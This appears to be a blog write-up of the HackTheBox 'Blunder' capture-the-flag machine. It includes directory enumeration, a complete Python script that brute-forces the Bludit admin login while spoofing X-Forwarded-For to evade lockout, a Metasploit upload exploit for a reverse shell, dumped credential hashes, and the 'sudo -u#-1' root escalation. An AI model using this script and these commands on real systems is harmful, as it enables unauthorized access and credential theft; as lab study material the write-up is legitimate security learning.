
Hi again ! This my write-up of Blunder, an easy Linux box released on May 30th 2020 on HackTheBox.
Recon
For a starter, let's use Nmap to scan the target.
$ nmap -A -p- -T4 10.10.10.191
Here is the output of the previous command :
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 14:12 CEST
Nmap scan report for 10.10.10.191
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 26.50 ms 10.10.14.1
2 26.96 ms 10.10.10.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.29 seconds
After taking a look a the website, there wasn't much to discover either. I tried to look for hidden files and directories. This is where it gets interesting. I'm used to using dirbuster for that task, but I had some trouble with screen resolution in VMs lately, so the nice graphical interface isn't showing up nicely, so I decided to install gobuster, and command-line alternative. And because it's command-line based, it's faster and more practical (and any good hacker should use commands right ? 🙂 ).
gobuster -w /usr/share/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.191:80/
That uncovers a few folders and files, but one in particular /admin
. When navigating to 10.10.10.191/admin
, you'll get a Blundit connection form, Bludit being a CMS, with a few vulnerabilities (brute-forcing passwords for example). One thing we could still use is a username.

After some (long) time, I used gobuster again, looking for .txt files this time. Indeed, there are sometimes very useful files like credentials.txt, robot.txt, todo.txt, users.txt, config.txt, etc...
gobuster -w /usr/share/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.191:80/ -x txt
Speaking of the devil :

todo.txt
contains some interesting information :

Fergus seems like a username.
Here is the script I found (and modified, so here is the original link). Let's try it out.
#!/usr/bin/env python3
import re
import requests
import sys
host = 'http://10.10.10.191'
login_url = host + '/admin'
username = 'fergus'
print("[*] Reading wordlist...")
with open(sys.argv[1],"r") as f:
wordlist = [p.replace("\n", "") for p in f.readlines()]
print("====================== CONFIG ======================")
print("== login url : {}".format(login_url))
print("== username : {}".format(username))
print("== wordlist : {} ({} passwords)".format(sys.argv[1], len(wordlist)))
print("====================================================")
print("\n[*] Starting")
counter = 0
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
if counter%100 == 0 and counter != 0:
print('[*] {} tries...'.format(counter))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
counter += 1
With rockyou I gave up after a few hours, it's just taking to long... So after trying a few other wordlists, I created my own.
cewl --depth 5 --min_word_length 5 http://10.10.10.191 > wordlist.txt

Here we go, we got some credentials !
fergus:RolandDeschain
Own user
Now let's use another bludit vulnerability : Directory Traversal Image File Upload CVE-2019-16113
Fireup Metasploit, and let it handle the rest :

Just remember to replace LHOST with your IP address corresponding to your tun0 interface.
To get a shell just type in shell
in the meterpreter command prompt, and then python -c 'import pty; pty.spawn("/bin/bash")'
After some enumeration, I found an interesting file with user credentials, that we only need to crack, at /var/www/bludit-3.10.0a/bl-content/databases
-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
Remember, the most powerful tool to crack hashes is .... Google. No just kidding, but googling a simple hash often leads to knowing what kind of algorithm created it, and in some cases like right here, what the password is.

So now we got the following credentials :
huge:Password120
Let's get the user flag and get right to the root privilege escalation that is fairly simple on this box.
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt
cat /home/hugo/user.txt
eef5cf18500c8b9f749c16e82a05890e
Own root
The first thing to always do when getting new privileges is to check what your allowed to do : sudo -l
f5cf18500c8b9f749c16e82a05890e
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
(ALL, !root) /bin/bash
, never seen this one, let's google it. Turns out it's super easy to get a root shell here. Just type in : sudo -u#-1 /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-content/tmp# cat /root/root.txt
cat /root/root.txt
07fa8ead67b17057681397f0a9e9a5f7
And here we go, that's all for this write-up, I hope you enjoyed 😉